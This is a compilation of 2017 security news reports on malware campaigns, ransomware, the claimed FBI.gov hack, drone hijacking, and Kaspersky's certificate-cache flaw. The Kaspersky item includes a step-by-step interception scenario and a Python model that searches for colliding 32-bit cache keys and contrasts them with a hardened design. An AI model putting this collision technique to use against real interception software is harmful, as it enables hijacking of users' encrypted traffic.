On Thursday, Netgear announced that the company has partnered up with Bugcrowd to launch Netgear Responsible Disclosure Program that can earn researchers cash rewards ranging from $150 to $15,000 for finding and responsibly reporting security vulnerabilities in its hardware, APIs, and the mobile apps.
Meanwhile, on the same day, the Federal Trade Commission (FTC) filed a lawsuit against D-Link, another large networking equipment provider, arguing that the company failed to implement necessary security protections in its routers and Internet-connected security cameras, leaving "thousands of consumers at risk" of hacking attacks.

If you are a bug bounty hunter, you should read all terms and conditions before shooting your exploits against Netgear products or its website.
One of them explicitly mentioned, "You may only exploit, investigate, or target security bugs against your own accounts and/or your own devices. Testing must not violate any law, or disrupt or compromise any data or access data that is not yours; intentional access of customer data other than your own is prohibited."
The company is paying out up to $15,000 for each vulnerability. The highest bounty will be given for the flaws that would allow access to the cloud storage video files or live video feeds of all its customers, and bugs that allow remote access to routers from the Internet, as shown in the chart above.

However, Netgear will also pay $10,000 for video feed and cloud storage access bugs that cannot be exploited in mass attacks. The same payout will also be given for security issues that provide access to the payment card data of all Netgear customers.
Other vulnerabilities that qualify for the bounty program include:
SQL injection bug
Information disclosure flaw
Stored cross-site scripting (XSS) vulnerability
Cross-site request forgery (CSRF) bug
Open redirect issues
Here's the Bingo! Bug bounty hunters will be rewarded with a triple prize if they successfully exploit at least three flaws in a chain.
So, what are you waiting for? Go and Grab 'em all!

A fake Super Mario Run for Android is serving the Marcher Banking Trojan
6.1.2017 securityaffairs Android

Zscaler experts have found in the wild a fake version of the Super Mario Run Android App that could install the Android Marcher banking trojan.
Bad news for mobile gamers: security experts at Zscaler have spotted a strain of the Android Marcher Trojan masquerading as the recently released Super Mario Run mobile game for Apple’s iOS.

Marcher is a sophisticated banking trojan used by cyber criminals to steal financial data from victims.

“Marcher is a sophisticated banking malware strain that targets a wide variety of banking and financial apps and credit cards by presenting fake overlay pages. Once the user’s mobile device has been infected, the malware waits for victims to open one of its targeted apps and then presents the fake overlay page asking for banking details.” states the analysis published by Zscaler.

Super Mario Run for iOS is one of Nintendo’s most interesting projects; the company developed the well-known game for Apple devices. However, Super Mario Run is still not available for Android, and crooks are taking advantage of this to spread their malicious variant.

The malicious code found by Zscaler installs the Marcher Trojan instead of a legitimate version of Super Mario Run for Android.

“In this new strain, the Marcher malware is disguised as the Super Mario Run app for Android. Knowing that Android users are eagerly awaiting this game, the malware will attempt to present a fake web page promoting its release.” continues the blog post published by Zscaler.

The experts also shared the following details related to the threat:

Name : Super Mario Run
Package Name : uiq.pizfbwzbvxmtkmtbhnijdsrhdixqwd
MD5 : d332560f1fc3e6dc58d94d6fa0dab748
Detections : 12/55(at time of analysis)
When victims try to install the app, it asks for multiple permissions, including administrative rights.

The current Marcher version targets account management apps and major banks.
The researchers explained that this Marcher variant also presents fake credit card pages when victims open the Google Play store. The trojan locks out Google Play until the victims supply their credit card information.

Researchers suspect the malware is still under development; they observed that the banking overlay pages served by the C&C were not functioning properly at the time of the analysis.

“In the current variant, we have observed a new obfuscation technique, in which all important string characters are delimited with ‘<<zB5>>‘ as shown below.” continues the analysis.

Crooks always try to take advantage of the gamers’ euphoria that coincides with the release of new games.

The same happened last year when the Pokemon GO application was released. Experts from ProofPoint spotted in the wild a backdoored version of the popular Pokemon GO Android app that could allow attackers to gain control over victims’ devices.

MM Core APT malware is back, Forcepoint has detected 2 new versions
6.1.2017 securityaffairs

Forcepoint has detected two new versions of an advanced persistent threat (APT) malware dubbed MM Core APT and first discovered in 2013.
The MM Core APT malware has been in the wild since April 2013, when it was spotted for the first time by experts at FireEye.

The malware researchers dubbed the first release of the malware “TROJAN.APT.BANECHANT” (2.0-LNK); it is mainly a backdoor used by threat actors to steal information from victims. The malware was used to target governments in the Middle East and Central Asia.

BaneChant waits for multiple mouse clicks before starting its activity; this behavior was implemented in an attempt to evade sandboxes.

BaneChant’s callback also goes to a legitimate URL: the malware contacts a legitimate URL shortening service that then redirects the communication to the C&C server. In this way, the authors prevent security solutions from blacklisting the command and control (C&C) servers.

The malware requires an Internet connection, because the malicious code is downloaded directly into memory and executed.

A new version of the MM Core malware dubbed “StrangeLove,” tracked as “2.1-LNK,” was discovered in June 2013 by researchers at Context Information Security. The new version was characterized by some modifications in the downloader component. Threat actors used StrangeLove to target entities in the Middle East.

Back to the present, experts from Forcepoint have detected two new versions of the MM Core malware dubbed BigBoss (2.2-LNK) and SillyGoose (2.3-LNK).

“Attacks using “BigBoss” appear likely to have occurred since mid-2015, whereas “SillyGoose” appears to have been distributed since September 2016. Both versions still appear to be active.” reads the reports published by Forcepoint.


The new variants infected users in the US and Africa; the experts observed that victims belong to multiple industries, such as news and media, defense, oil and gas, and telecommunications.

Below are the main functionalities implemented in the MM Core backdoor:

Send the infected system’s computer name, Windows version, system time, running processes, TCP/IP configuration, and top-level directory listings for drives C to H
Download and execute file
Download and execute file in memory
Update itself
Uninstall itself
A novelty introduced in the latest variant of the backdoor is that the downloader component leverages the Microsoft Office Memory Corruption Vulnerability (CVE-2015-1641) to extract the embedded malware.

To make tracking of the C&C infrastructure harder, the threat actors are using WHOIS privacy protection services for their new C&C domains.

Crooks also signed the code of the downloader components with a valid Authenticode certificate from the Russian organisation “Bor Port”; the threat actors behind the APT malware likely stole it.

Forcepoint pointed out that while the number of MM Core samples is low, it has noticed that the Trojan’s downloader shares code, techniques and infrastructure with Gratem, a more active downloader that has been around since at least 2014. Recent samples have also been found to share the same certificates.

Experts believe the MM Core APT malware is just part of a larger cyber espionage operation which they are still investigating. They linked the malware to another trojan dubbed Gratem:

“On the other hand, while the volume of related MM Core samples remain low, we noticed that the MM Core downloader shares code, techniques and network infrastructure with a trojan called “Gratem”, as well as sharing the same authenticode certificate for recent samples. Gratem is a more active downloader malware family which has been distributed since at least 2014. Ultimately this suggests that MM Core may be a part of a larger operation that is yet to be fully uncovered.” states the report.

Give a look at the report for further details, including the Indicators of Compromise (IoCs).

KillDisk Ransomware Targets Linux; Demands $250,000 Ransom, But Won't Decrypt Files
6.1.2017 thehackernews

What will you do if ransomware infects you? Should you pay or not to recover your files?
Believe me, the FBI advises - Pay off the criminals to get your files back if you don't have a backup.
But paying off a ransom to cyber criminals is definitely not a wise option because there is no guarantee that you'll get the decryption key in return.
In the latest incident, a new variant of the KillDisk ransomware has been found encrypting Linux machines, making them unbootable with their data permanently lost.

What is KillDisk? KillDisk is a destructive data wiping malware that has previously been used to sabotage companies by randomly deleting files from the computers.
KillDisk is the same component associated with the Black Energy malware that was used to hit several Ukrainian power stations in 2015, cutting power for thousands of people.
But according to ESET security researchers, the nasty KillDisk disk wiper malware is back with new variants that target Windows and Linux desktops and servers, encrypt files and then ask for an unusually large ransom:
Around $218,000 in Bitcoins – possibly the world's most expensive ransom attacks.
What's even worse? The Linux variant of the KillDisk ransomware does not store the encryption key anywhere, neither on disk nor on a command-and-control server.
So, even after you pay this extremely large ransom, you are not going to get any decryption key to recover your important files.

The good news is that ESET researchers have found a weakness in the encryption employed by the Linux variant which makes recovery of encrypted files possible, though difficult. But the same flaw doesn't exist in the Windows variant of the KillDisk ransomware.
KillDisk Deletes your Files Even After Paying $218,000
According to researchers, the files of victims targeted with the Linux variant of the malware are encrypted using "Triple-DES applied to 4096-byte file blocks," and each file on the computer is encrypted by a different set of 64-bit encryption keys.
The malware then displays the ransom note in an unusual manner: within the GRUB bootloader, which means the KillDisk Linux ransomware overwrites the bootloader entries to show ransom text that asks victims to pay 222 Bitcoin.
But paying the criminals' ransom will not bring your files back, as the Linux variant does not store decryption keys anywhere.
"KillDisk serves as another example of why paying ransom should not be considered an option. When dealing with criminals, there's no guarantee of getting your data back – in this case, the criminals clearly never intended to deliver on their promises," says Robert Lipovský, ESET Senior Researcher.
Prevention is the Best Practice
So, the only safe way of dealing with ransomware is prevention. As I previously recommended, the best defense against Ransomware is to create awareness within the organizations, as well as maintaining back-ups that are rotated regularly.
Most viruses are introduced by opening infected attachments or clicking on links to malware usually in spam emails. So, DO NOT CLICK on links provided in emails and attachments from unknown sources.
Moreover, ensure that your systems are running the latest version of Antivirus software with up to date malware definitions.

FBI Hacked, Again! Hacker Leaks Data After Agency Failed to Patch Its Site
5.1.2017 thehackernews Hacking

It seems like the FBI has been hacked, once again!
A hacker using the Twitter handle CyberZeist has claimed to have hacked the FBI's website (fbi.gov) and leaked the personal account information of several FBI agents publicly.
CyberZeist had initially exposed the flaw on 22 December, giving the FBI time to patch the vulnerability in its website's code before making the data public.
The hacker exploited a zero-day vulnerability in the Plone CMS, an open-source content management system used by the FBI to host its website, and leaked the personal data of 155 FBI officials to Pastebin, including their names, passwords, and email accounts.
CyberZeist tweeted multiple screenshots as proof of his claims, showing his unauthorized access to server and database files using a zero-day local file inclusion vulnerability affecting its Python plugins.
The hacker also found that the FBI's website is hosted on a virtual machine running a customized older version of the open-source FreeBSD operating system.

According to another tweet, the Plone CMS zero-day exploit is up for sale on an unnamed dark web marketplace.
The Plone CMS is considered to be one of the most secure CMSes available today and is used by many major websites like Google, and major United States agencies including the FBI and the CIA.
CyberZeist also warned other agencies, including the European Union Agency for Network and Information Security, Intellectual Property Rights Coordination Center, and Amnesty International, which are currently using the Plone CMS that they too are vulnerable to a similar attack.
The FBI authorities have yet to respond to the claims.
Update — Official Statement from Plone Security Team:
Meanwhile, the Plone Security team has released a security advisory saying that it will release a security update on 17th January to its customers to "patch various vulnerabilities."
For now the advisory doesn't include much technical information about the vulnerabilities, but it states that all supported Plone versions (4.x, 5.x) are affected. Previous versions could be affected as well.
"The advisory information we give in those pre-announcements is standard. In fact, the upcoming patch is to fix a minor issue with Zope which is neither a RCE or LFI inclusion problem."
Notably, Plone Security team has also mentioned that "there is no evidence that the issues fixed here are being actively exploited."
"The issue we are fixing in no way resembles CyberZeist's claims, neither do the issues we fixed last month." Matthew Wilkes, Plone security team, told The Hacker News.
"The aim of releasing information from such a hack is to convince people that you've indeed hacked the target. Claims of hacks that only give information that is publicly available (such as open-source code) or impossible to verify (such as hashed passwords) are common signs of a hoax," Matthew said.
“It is extremely easy to fake a hack like this; it takes rudimentary Photoshop skills or use of Chrome javascript developer console.” - Nathan van Gheem, Plone security team, told THN.
Also, Mr. Alexandru Ghica, Eau de Web, the maintainer of an EU website which the hacker also claimed to have hacked, says, "I can say for sure that at least some of the data posted as proof is 100% fake. The hoax was a bit elaborate indeed, but that's it."
This is not the first time CyberZeist has claimed to have hacked the FBI website. In 2011, the hacker breached the FBI website as a member of the infamous hacker collective known as "Anonymous."

This Ransomware Unlocks Your Files For Free If You Read CyberSecurity Articles
5.1.2017 thehackernews
Ransomware has been around for a few years, but in the last two years it has become one of the fastest growing threats to businesses and users across the world, and so it will be in 2017.
Ransomware is a piece of malware that encrypts the files on your computer with strong encryption algorithms and then demands a ransom in Bitcoin to decrypt the data so you can regain access to your encrypted files.
We have seen some nastier ransomware infections over the past couple of years. The most interesting one was Popcorn Time, which decrypts victims' files for free if they pass the infection on to other people.
Now, a new strain of ransomware takes the infection to a whole new level of craziness.
Dubbed Koolova, the ransomware will restore your encrypted files for free, just like Popcorn Time. The only difference between the two infections is that you don't have to infect others to get a free decryption key.
Instead, all you have to do is educate yourself about ransomware by reading two cyber security awareness articles about avoiding the infection.

Discovered by security researcher Michael Gillespie and reported by BleepingComputer, the Koolova ransomware is not professionally coded and appears to be a work in progress.
The ransomware requires a lot of technical knowledge to get to the ransom demand screen, which tells victims what they need to do in order to avoid the erasure of their data.
Once installed, Koolova encrypts the victim's files and then displays a warning screen whose text tells the victim to open and read two articles before they can get the decryption key.
If the victim is too lazy to read both articles, Koolova starts a countdown; if it reaches zero, the ransomware will delete the encrypted files, like the Jigsaw malware does.
But once the victim reads both articles, the Decrypt My Files (Decripta i Miei File) button becomes available. On clicking this button, Koolova will connect to the Command-and-Control (C&C) server and retrieve the decryption key.
The victim will then be able to take that decryption key and enter it into the key field to decrypt files.
Although the motive behind the ransomware attack is not to harm people, these kinds of actions are considered to be illegal in many countries. On January 1, a new law went into effect in California that outlaws the use of ransomware.
Do you consider educating people about any threat like this a good practice? Hit the comments below.

FireCrypt comes as a malware building kit and includes DDoS code
5.1.2017 securityaffairs

Recently experts from MalwareHunterTeam discovered FireCrypt ransomware, a threat that comes as a malware building kit and includes DDoS code.
Ransomware has become one of the fastest growing threats; new malware implements sophisticated features to avoid detection and to spread rapidly to the greatest number of machines.

Recently experts from MalwareHunterTeam discovered a new strain of ransomware dubbed FireCrypt, that includes also a component to launch DDoS attacks.

The experts noticed that FireCrypt continuously connects to a certain URL, downloads content from it and saves it to the local machine’s %Temp% folder. In this way, the malware fills the machine with junk files; the URL is hardcoded in the source code of the malware.

The DDoS component analyzed by the researchers targets the official portal of Pakistan’s Telecommunication Authority (http://www.pta.gov(.)pk/index.php) and downloads the content to a file in the %Temp% folder.

The FireCrypt ransomware is created with a malware builder dubbed BleedGreen, a command-line application that automates the process of putting FireCrypt samples together. BleedGreen allows crooks to rapidly customize the ransomware, generating a unique executable with a custom name and a file icon chosen by the creator.

According to the malware researchers, the ransomware builder is very basic.

“Compared to other ransomware builders, this is a very low-end application. Similar builders usually allow crooks to customize a wider set of options, such as the Bitcoin address where to receive payments, the ransom demand value, contact email address, and more.” states a blog post published by Bleepingcomputer.com.


The builder is able to disguise the FireCrypt executable under a PDF or DOC icon; it is also able to make small changes to the binary to make detection of the ransomware harder.

The infection process starts when a victim launches the executable (EXE file) generated by the builder. The ransomware first kills the Task Manager (taskmgr.exe) process and then starts encrypting the user’s files with AES-256 encryption.

Files encrypted by FireCrypt are easy to recognize because the malware appends the .firecrypt extension to the file name. The ransomware drops a ransom note on the desktop that is identical to the one used by the Deadly for a Good Purpose Ransomware, and the two malware families present many similarities.

“Compared to FireCrypt, the only difference is that the Deadly for a Good Purpose Ransomware also featured a logo at the top of the ransom note, now missing in FireCrypt. But, at a close inspection of Deadly’s source code, MalwareHunterTeam was able to discover that both ransomware versions used the same email and Bitcoin addresses, showing a clear connection between the two, with FireCrypt being a rebranded version of the original Deadly for a Good Purpose Ransomware.” continues the post on Bleepingcomputer.

Let’s close with a reflection on the DDoS component: the target URL cannot be modified by the ransomware builder, and the DDoS attack is not effective, because it would require infecting a huge number of PCs that are all connected to the Internet at the same time.

Kaspersky fixing a serious problem with inspection digital certificates
5.1.2017 securityaffairs Vulnerability

Google hacker Tavis Ormandy discovered a serious flaw that affects the Kaspersky antivirus software and the way it manages the digital certificates it uses for traffic inspection.
Experts from Kaspersky are fixing a problem that disabled certificate validation for 400 million users. The problem was spotted by the notorious Google hacker Tavis Ormandy; the vulnerability affects the Kaspersky antivirus software and the way it uses certificates to analyze encrypted traffic.

The security software installs its own trusted CA, the Kaspersky Anti-Virus Personal Root, and uses that certificate for traffic inspection; in this way it is able to decrypt the traffic and scan it for malicious patterns.

“In order to inspect encrypted data streams using SSL/TLS, Kasperky installs a WFP driver to intercept all outgoing HTTPS connections. They effectively proxy SSL connections, inserting their own certificate as a trusted authority in the system store and then replace all leaf certificates on-the-fly. This is why if you examine a certificate when using Kaspersky Antivirus, the issuer appears to be “Kaspersky Anti-Virus Personal Root”.” Ormandy wrote in a security advisory.

The process implemented by Kaspersky for certificate interception has previously resulted in serious vulnerabilities. Now the expert discovered other issues, such as the way leaf certificates are cached, which relies on an extremely naive fingerprinting technique.

“Kaspersky cache recently generated certificates in memory in case the user agent initiates another connection. In order to do this, Kaspersky fetches the certificate chain and then checks if it’s already generated a matching leaf certificate in the cache. If it has, it just grabs the existing certificate and private key and then reuses it for the new connection.” explained the expert.

“The cache is a binary tree, and as new leaf certificates and keys are generated, they’re inserted using the first 32 bits of MD5(serialNumber||issuer) as the key. If a match is found for a key, they just pull the previously generated certificate and key out of the binary tree and start using it to relay data to the user-agent.”

It is easy to understand that a 32-bit key is open to brute-forcing: a collision can be generated in a few seconds. An attacker can thus produce a certificate that collides with another site's certificate.

Ormandy also provided a description of the attack:

Mallory wants to intercept mail.google.com traffic, for which the 32bit key is 0xdeadbeef.
Mallory sends you the real leaf certificate for mail.google.com, which Kaspersky validates and then generates its own certificate and key for.
On the next connection, Mallory sends you a colliding valid certificate with key 0xdeadbeef, for any commonName (let’s say attacker.com).
Now Mallory redirects DNS for mail.google.com to attacker.com, Kaspersky starts using their cached certificate and the attacker has complete control of mail.google.com.
Ormandy also provided proof of the bug by forcing a collision between the Hacker News and manchesterct.gov websites.

“You can reproduce this bug, by visiting https://autodiscover.manchesterct.gov, then https://news.ycombinator.com and observing that the content is signed by the wrong certificate.” he added. “So if you use Kaspersky Antivirus in Manchester, Connecticut and were wondering why Hacker News didn’t work sometimes, it’s because of a critical vulnerability that has effectively disabled SSL certificate validation for all 400 million Kaspersky users.”
The expert also provided C source code that can be used to generate a colliding certificate for testing.
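As an added illustration (not Ormandy's code and not Kaspersky's), the following Python model compares the cache key the advisory describes, the first 32 bits of MD5(serialNumber||issuer), with a hardened lookup that keys on a full SHA-256 digest and re-checks the cached leaf before reusing it. The Leaf fields, the issuer name and the host names are constructed placeholders, and the collision search is a birthday search among random serials, which is enough to show why a 32-bit key cannot serve as a certificate identity.

```python
import hashlib
import random
from dataclasses import dataclass

# Constructed model of an intercepting proxy's leaf-certificate cache.
# Field names and the "generated-cert-for:" marker are illustrative only.


@dataclass(frozen=True)
class Leaf:
    """Minimal stand-in for a server's leaf certificate."""
    serial: bytes      # serialNumber
    issuer: str        # issuer DN
    common_name: str   # subject commonName
    spki: bytes        # public key bytes (constructed placeholder)


def weak_cache_key(leaf: Leaf) -> bytes:
    """The scheme the advisory describes: first 32 bits of MD5(serialNumber||issuer)."""
    return hashlib.md5(leaf.serial + leaf.issuer.encode()).digest()[:4]


def strong_cache_key(leaf: Leaf) -> bytes:
    """Hardened key: full SHA-256 over every identifying field, length-prefixed
    so that field boundaries cannot be shifted to produce the same input."""
    h = hashlib.sha256()
    for part in (leaf.serial, leaf.issuer.encode(), leaf.common_name.encode(), leaf.spki):
        h.update(len(part).to_bytes(4, "big") + part)
    return h.digest()


class InterceptCache:
    """Maps a seen leaf to the proxy-generated certificate it relays to the user agent."""

    def __init__(self, key_fn, verify_full_match: bool):
        self._key_fn = key_fn
        self._verify = verify_full_match
        self._store = {}  # cache key -> (leaf that produced it, generated cert)

    def cert_for(self, leaf: Leaf) -> str:
        key = self._key_fn(leaf)
        hit = self._store.get(key)
        # A hardened cache never trusts the key alone: it re-checks the cached leaf.
        if hit is not None and (not self._verify or hit[0] == leaf):
            return hit[1]
        generated = f"generated-cert-for:{leaf.common_name}"
        self._store[key] = (leaf, generated)
        return generated


def find_weak_key_collision(issuer: str, seed: int = 1, max_tries: int = 2_000_000):
    """Birthday search: two distinct serials whose weak keys coincide.
    With only 2^32 possible keys this needs roughly 2^16 candidates."""
    rng = random.Random(seed)  # deterministic so the run is reproducible
    seen = {}
    for _ in range(max_tries):
        serial = rng.getrandbits(128).to_bytes(16, "big")
        key = weak_cache_key(Leaf(serial, issuer, "", b""))
        other = seen.get(key)
        if other is not None and other != serial:
            return other, serial
        seen[key] = serial
    raise RuntimeError("no collision found within max_tries")


def demonstrate(issuer: str = "Example Intercepting CA") -> dict:
    """Replay the advisory's scenario against both cache designs: the real leaf
    is cached first, then a leaf with a colliding key arrives."""
    victim_serial, impostor_serial = find_weak_key_collision(issuer)
    victim = Leaf(victim_serial, issuer, "mail.example.com", b"victim-public-key")
    impostor = Leaf(impostor_serial, issuer, "attacker.example", b"attacker-public-key")

    results = {}
    for name, cache in (
        ("weak", InterceptCache(weak_cache_key, verify_full_match=False)),
        ("strong", InterceptCache(strong_cache_key, verify_full_match=True)),
    ):
        cache.cert_for(victim)                     # step 1: real leaf seen and cached
        results[name] = cache.cert_for(impostor)   # step 2: colliding leaf arrives
    return results


if __name__ == "__main__":
    for name, cert in demonstrate().items():
        print(f"{name:6s} cache relays: {cert}")
```

The weak cache hands the impostor the certificate generated for mail.example.com, which is exactly the confusion the advisory describes; the strong cache generates a fresh certificate for attacker.example.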

The case of flying saucer – Highway to the Danger Drone
5.1.2017 securityaffairs IT

One of the most discussed topics these days are the various nefarious uses that a Drone can be put to or just flown where they shouldn’t be.
2016 has been an eventful year, bagged with mixed sentiments around the US presidential election, Brexit and global terrorism striking the world’s news outlets. Not far behind are the debates seeking to understand innovative venues and loopholes that have the potential to create havoc globally. One of the most discussed topics these days are the various nefarious uses that drones can be put to, or simply where they are flown when they shouldn’t be.

Drone pilots’ capabilities to fly a drone into restricted areas, or the risk of harming others, is a topic for another day. In this short blog we have tried to look at the various strategies governments and aviation authorities have attempted to instigate to curb the menace, only to see a threat evolving which poses a danger to the drones themselves.

So just what is a drone anyway? For the sake of argument let’s focus on the type of aircraft that you can purchase as a consumer for video and photography purposes (as opposed to the firing-missiles-and-blowing-things-up type). The world’s media has slapped the label “Drone” onto any quadrocopter, octocopter or other modern platform without actually investigating the differences between commercial platforms, military devices and traditional models. Essentially our UAV (Unmanned Aerial Vehicle, which is the correct term!) has four components:

Power supply (typically a high power Li-Po Battery)
Propulsion units (4+ motors)
Transmitter (Video/Photo) / Receiver
Motherboard (the Flight controller)
Up until number 3 we were in the same ballpark as remote-control helicopters and other model aircraft, which are controlled with servos according to the radio signals. However, with the introduction of the motherboard we now have a flying computer with just as many undisclosed security issues as any other Internet of Things (IoT) device. Just because there isn’t a cable connected to the device does not mean that it is not susceptible to attack. For a clear breakdown of what is and isn’t a drone we have the following:

Model Aircraft: Remote control only, no preprogrammed flight paths etc.
Drone: Equipped with a flight computer, however, has no ability to follow a pre-programmed path, nor does it have any built-in intelligence
Unmanned Aerial Vehicle (UAV): Encompasses all of the features seen in a drone but has additional intelligence features (object tracking, terrain/hazard avoidance etc.)
Unmanned Aerial System (UAS): All components seen in a UAV with additional support equipment (base station etc.)
So let’s have a look at some of the ways that have been identified to remove consumer UAVs from the air.

Shotgun: Eh, think we get this one! The US town of Deer Trail, Colorado even attempted to enact a law to allow residents to hunt federal UAVs and shoot them down!

Net: Police forces and organizers of sporting events around the world have been trialing nets which are launched from a bazooka. The net expands in the air and fouls the UAV’s rotor blades, bringing it crashing to earth. There are also other, slightly less destructive methods where nets are carried by other, larger UAVs; this approach has been adopted by the police force in Tokyo[1]. These again snare the rotor blades and are designed to capture the errant flying machine rather than send it crashing to the ground and onto potential pedestrians.

RF Generator (Denial of Service!): Or more simply a UAV radio signal jammer. These devices overpower the radio signals (typically 2.4 GHz for most commercial UAVs, which is the same range as standard Wi-Fi networks, Bluetooth connections, microwave ovens, car alarms, baby monitors, and ZigBee devices) with white noise, causing the UAV to return to its “Home” position if this has been set (or is available), or at the very least severing the control from the pilot. However, it should be noted that these devices themselves are highly illegal in most countries[2]. Some commercial firms are investigating jamming guns which target a narrow window and allow the operator to aim at the offending UAV without affecting other services.

Exploitation: The takeover of the UAV’s flight systems by an outside attacker by various technical means, allowing the attacker complete control of the system for their own purposes. The owner/pilot is locked out and has no way of controlling the system.

Hacking UAVs is not new with the first high profile case being of an RQ-170 Sentinel stealth drone, a key weapon in the intelligence gathering arsenal of the US Central Intelligence Agency (CIA); the drone was diverted and captured by the Iranians in December 2011. In this case, the Iranian military had identified that the US Military utilized encrypted GPS frequencies for its control systems. They first jammed the drone’s communications link to its ground controllers (which forced the drone into autopilot mode) this also had the effect of forcing the drone to search for unencrypted commercial control channels. The Iranian attackers spoofed these signals sending wrong GPS coordinates tricking the drone into believing it was at its home base in Afghanistan, thus landing on Iranian territory to the welcoming arms of its attackers. It should be noted that the US Military disputed this account and stated that it was a system malfunction; however subsequently researchers have been able to reproduce the incident with commercial UAVs using encrypted GPS signals.

Security analysts and hackers alike have been investigating these types of attacks for some time now. Samy Kamkar (an independent researcher) created a program called “dronestrike” in 2013, where he mounted a Raspberry Pi computer running his code on his Parrot AR UAV 2.0 along with a wireless transmitter[3]. When his UAV was flown in the vicinity of another Parrot UAV, the dronestrike program would make a connection to the victim UAV, disconnect the owner/pilot and take control of the system itself.

Earlier this year Johns Hopkins University[4] set its capstone project for Master’s Degree students. The students’ task was to conduct wireless pen testing on a consumer UAV and then take what they had identified and craft exploits to attack the system. Three different strategies were identified, all of which successfully broke the connection to the pilot:

Denial of Service: The UAV was bombarded with over 1,000 wireless connection requests in a short period of time; each connection attempt asked to take control of the aircraft. This overloaded the UAV’s CPU, causing it to shut down.
Buffer Overflow: In this scenario, an exceptionally large data packet was sent to the UAV. This exceeded the buffer in the UAV’s flight application, causing the aircraft to crash.
Spoofing: The third scenario utilized an attack against the controller rather than the UAV. A fake packet was sent to the controller impersonating the UAV itself. The controller severed the connection with the real UAV, resulting in the aircraft making an emergency landing. XBee spectral analysis is seen to be utilized aggressively here.
These three types of attacks are nothing new to cyber security analysts, with attacks of this kind occurring daily against enterprise computer systems. But surely we as an industry don’t really have to be that worried about this, as these are only isolated cases for hobbyist fliers? Think again: a UAV is a flying computer. Computers get hacked. Period!


To add complication to this, many logistics firms are trialing UAV delivery systems, including Amazon, DHL and Domino’s Pizza to name but a few. Amazon has already been awarded a patent for the flying warehouse, an airborne fulfillment center (AFC). The notion is that the AFC could be used as a launch pad for drones to make local deliveries. The approved patents highlight that the AFC would be housed at about 45,000 feet, allowing UAVs to be stocked, deployed and flown as necessary.

With the above developments moving forward, the possibility of hacking into a UAV and diverting it without the owner knowing where it has gone will be a massive incentive for criminals seeking to steal the deliveries flying over their heads. With the assistance of insiders within the delivery firm, the criminals can target specific cargos. We have already seen evidence that attackers are easily able to intercept the operator’s commands at a distance of up to 2 kilometers and spoof their own. At a distance of 100 meters, WEP can be easily cracked and the drone can be stolen.

A number of firms are now looking to UAVs to provide a mobile security platform for organizations with large estates or, in the case of smaller UAVs, warehouse security. The opportunity to attack these platforms is twofold. Firstly, an attacker who is able to take control of the UAV is then able to turn its “eyes” away from any intruders on the ground. Secondly, and more worrying, is where the attacker diverts the drone, lands it and attaches their own monitoring equipment (cameras with transmitting equipment, etc.) to the aircraft. When this is returned to the control of the automated system/pilot, the UAV will continue about its tasks as though nothing has happened, all the while becoming a physical Trojan Horse for the attached monitoring equipment. This could lead to the loss of trade secrets in the case of indoor warehouse UAVs. This kind of attack could also be used to kill off market competition, not forgetting that currently 70% of the commercial drone market is held by the Chinese company DaJiang Innovation Technology (DJI).

One threat vector which is already being utilized is criminal gangs using UAVs to smuggle drugs into prisons for waiting inmates. Whilst this is already occurring, the UAVs themselves have either been purchased or stolen from their owners’ residences. The ability to hack into a UAV, take it over and then use it for your own purposes removes a great deal of risk and removes all attribution to the criminals when and if the UAV is captured by prison staff. The ability to steal a UAV in flight is going to be a great temptation to criminals.

On a related note, there is also a psychological dimension, as the drone pilot, while operating at a distance, can be in a sense detached from the local context and culture. This may trigger the creation of a dream-world/gaming environment, thus detaching the operator from physical reality and putting operator behavior at risk with respect to professional responsibility and social mores. [5]

What we have seen in this blog is that UAVs, or drones (if you must!), are just like any system which relies upon a computer to operate. They can be hacked and taken over for many nefarious activities, and we have only just seen the beginning. When the delivery platforms take to the air (pun intended), cyber criminals are going to have a field day!

We are truly on the highway to the Danger Zone.

[1] http://www.telegraph.co.uk/technology/2016/01/21/tokyo-police-are-using-drones-with-nets-to-catch-other-drones/

[2] https://www.fcc.gov/general/jammer-enforcement

[3] https://www.youtube.com/watch?v=EHKV01YQX_w

[4] http://releases.jhu.edu/2016/06/08/johns-hopkins-team-makes-hobby-drones-crash-to-expose-design-flaws/

[5] http://releases.jhu.edu/2016/06/08/johns-hopkins-team-makes-hobby-drones-crash-to-expose-design-flaws/

FBI website hacked by CyberZeist and data leaked online
5.1.2017 securityaffairs Hacking

The notorious black hat hacker CyberZeist (@cyberzeist2) has broken into the FBI website FBI.gov and leaked data on Pastebin.

The hacker leaked the FBI.GOV accounts that he found in several backup files (acc_102016.bck, acc_112016.bck, old_acc16.bck, etc.).
Leaked records contain account data, including names, SHA1-hashed passwords, SHA1 salts, and emails.

The intrusion occurred on December 22, 2016; the hacker revealed that he had exploited a zero-day vulnerability in the Plone Content Management System.

“Going back to 22nd December 2016, I tweeted about a 0day vulnerability in Plone CMS which is considered as the most secure CMS till date. This CMS is used by many top agencies including FBI”


CyberZeist explained that he did not find the zero-day in the CMS himself; he was just tasked with testing it against the websites of the FBI and Amnesty. The vulnerability resides in some Python modules of the CMS. Other websites are potentially exposed to the same zero-day attack, including the Intellectual Property Rights Coordination Center and the EU Agency for Network and Information Security.

The hacker also tweeted an image of the FBI website that was down just after the hack.


CyberZeist tested the 0-day because the vendor was too afraid to use it against the FBI website. The hacker noticed that while media from Germany and Russia published the news about the hack, US-based publishers ignored it.

According to CyberZeist, the FBI contacted him to pass on the leaks.

“I was contacted by various sources to pass on the leaks to them that I obtained after hacking FBI.GOV but I denied all of them. Why? just because I was waiting for FBI to react on time. They didn’t directly react and I don’t know yet what are they up to, but at the time I was extracting my finds after hacking FBI.GOV,” he wrote.

The hacker added further information on the attack: while experts at the FBI were working to fix the issue, he noticed that the Plone 0day exploit was still working against the CMS backend.

“I couldn’t gain a root access (obviously!), but I was able to recon that they were running FreeBSD ver 6.2-RELEASE that dates back to 2007 with their own custom configurations. Their last reboot time was 15th December 2016 at 6:32 PM in the evening.” he added.

It seems that the administrators of the website made some regrettable errors; for example, they exposed the backup files on the same server, so it was trivial for the hacker to access them, even though he decided not to publish them immediately.

“While exploiting FBI.GOV, it was clearly evident that their webmaster had a very lazy attitude as he/she had kept the backup files (.bck extension) on that same folder where the site root was placed (Thank you Webmaster!), but still I didn’t leak out the whole contents of the backup files, instead I tweeted out my findings and thought to wait for FBI’s response”


Now let’s sit and wait for the FBI’s response. I obviously cannot publish the 0day attack vector myself as

The hacker confirmed that the 0-day is offered for sale on Tor by a hacker who goes by the moniker “lo4fer.”

“Once this 0day is no longer being sold, I will tweet out the Plone CMS 0day attack vector myself.” CyberZeist added.

